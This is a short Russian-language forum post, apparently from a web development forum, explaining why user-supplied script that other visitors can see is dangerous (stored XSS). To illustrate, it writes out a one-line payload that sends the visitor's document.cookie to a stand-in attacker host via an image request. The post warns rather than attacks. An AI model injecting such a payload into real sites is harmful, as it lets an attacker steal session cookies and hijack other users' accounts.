Показать сообщение отдельно
  #13 (permalink)  
Старый 25.01.2012, 17:20
Аватар для Aetae
Тлен
Отправить личное сообщение для Aetae Посмотреть профиль Найти все сообщения от Aetae
 
Регистрация: 02.01.2010
Сообщений: 6,590

Вам же сказали - если человек может воспользоваться этим только для себя - всё нормально.
Но если он может показать написанное другим, то нет.

Сам себе человек и так может что угодно запустить на вашей странице.
Если же он может дать другим посмотреть написанное, то нет ничег проще чем написать например:
document.write('<img src="http://l33thaxor.net/?'+encodeURIComponent(document.cookie)+'">')
__________________
29375, 35

Последний раз редактировалось Aetae, 25.01.2012 в 17:24.
Ответить с цитированием